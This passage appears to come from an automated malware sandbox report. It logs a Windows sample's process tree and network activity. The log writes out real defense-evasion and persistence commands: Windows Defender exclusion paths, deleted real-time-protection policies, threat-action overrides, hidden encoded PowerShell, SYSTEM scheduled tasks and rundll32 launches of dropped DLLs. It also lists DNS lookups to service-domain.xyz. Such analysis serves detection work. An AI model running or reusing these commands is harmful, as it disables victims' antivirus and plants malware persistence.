                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1600
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1612
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1720
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:2684
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1980
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2036
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:2556
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:2300
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2460
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2752
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2816
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:996
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2196
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2876
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2492
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2668
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:2616
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3020
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1524
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2912
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2688
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /CREATE /TN "gbfUGSHgt" /SC once /ST 03:04:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                  3⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3024
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /run /I /tn "gbfUGSHgt"
                                                                  3⤵
                                                                    PID:2788
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /DELETE /F /TN "gbfUGSHgt"
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1692
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                    3⤵
                                                                      PID:2076
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1672
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2128
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                        4⤵
                                                                          PID:1728
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "mVwrlHrSDNRLOGqZG" /SC once /ST 03:13:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe\" uL /NafCdidyF 525403 /S" /V1 /F
                                                                        3⤵
                                                                        • Drops file in Windows directory
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:448
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "mVwrlHrSDNRLOGqZG"
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2580
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 628
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Program crash
                                                                        PID:1148
                                                                    • C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe
                                                                      C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe uL /NafCdidyF 525403 /S
                                                                      2⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Drops Chrome extension
                                                                      • Drops file in System32 directory
                                                                      • Drops file in Program Files directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:612
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                        3⤵
                                                                          PID:1764
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            PID:1560
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1596
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1792
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:804
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:908
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                6⤵
                                                                                  PID:604
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                              4⤵
                                                                              • Indirect Command Execution
                                                                              PID:2996
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:1948
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:1788
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                  • Indirect Command Execution
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:684
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                      PID:2516
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                        6⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2384
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                    4⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:2256
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                      5⤵
                                                                                        PID:2140
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                          6⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Drops file in System32 directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2136
                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                            7⤵
                                                                                              PID:1068
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /DELETE /F /TN "bWNXgrRlacKgnUwPKK"
                                                                                      3⤵
                                                                                        PID:932
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                        3⤵
                                                                                          PID:1616
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            PID:2748
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1156
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2088
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  7⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1276
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:848
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2244
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2204
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                  7⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2216
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rksWaXujU\EFzTpY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "AlVsOicJKGYGSUS" /V1 /F
                                                                                          3⤵
                                                                                          • Drops file in Windows directory
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2188
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "AlVsOicJKGYGSUS2" /F /xml "C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml" /RU "SYSTEM"
                                                                                          3⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2672
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /END /TN "AlVsOicJKGYGSUS"
                                                                                          3⤵
                                                                                            PID:1780
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /DELETE /F /TN "AlVsOicJKGYGSUS"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1784
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "HqaqbRPcNxJZrD" /F /xml "C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1860
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "KtgLbJTNbqQVX2" /F /xml "C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1932
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "CaeXOOsQHbNfKhlUh2" /F /xml "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2404
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "eUzrIsCcCKtUEuKCBuS2" /F /xml "C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1972
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "KOXGBKFkHUHlhNtav" /SC once /ST 00:23:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll\",#1 /aNdidF 525403" /V1 /F
                                                                                            3⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1980
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "KOXGBKFkHUHlhNtav"
                                                                                            3⤵
                                                                                              PID:2040
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "mVwrlHrSDNRLOGqZG"
                                                                                              3⤵
                                                                                                PID:2440
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 1540
                                                                                                3⤵
                                                                                                • Loads dropped DLL
                                                                                                • Program crash
                                                                                                PID:2028
                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
                                                                                              2⤵
                                                                                                PID:2288
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
                                                                                                  3⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in System32 directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Enumerates system info in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2704
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "KOXGBKFkHUHlhNtav"
                                                                                                    4⤵
                                                                                                      PID:2668
                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                taskeng.exe {A9D37EFA-5736-4263-8B18-5CF7CD4EAAC9} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
                                                                                                1⤵
                                                                                                  PID:2356
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                    2⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2396
                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      3⤵
                                                                                                        PID:1804
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                      2⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2276
                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        3⤵
                                                                                                          PID:2736
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1628
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:3052
                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                        1⤵
                                                                                                          PID:876
                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                          1⤵
                                                                                                            PID:2796
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:2656

Network

• DNS service-domain.xyz (gLYDEcB.exe, flag: US)
  Remote address: 8.8.8.8:53
  Request: service-domain.xyz IN A
  Response: service-domain.xyz IN A 54.210.117.250
• DNS c.pki.goog (gLYDEcB.exe, flag: US)
  Remote address: 8.8.8.8:53
  Request: c.pki.goog IN A
  Response: c.pki.goog IN CNAME pki-goog.l.google.com
            pki-goog.l.google.com IN A 216.58.214.163
• GET http://c.pki.goog/r/r1.crl (gLYDEcB.exe, flag: FR)
  Remote address: 216.58.214.163:80
  Request:
    GET /r/r1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: c.pki.goog
  Response:
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                              Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                              Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                              Content-Length: 854
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Server: sffe
                                                                                                              X-XSS-Protection: 0
                                                                                                              Date: Mon, 26 Aug 2024 04:29:28 GMT
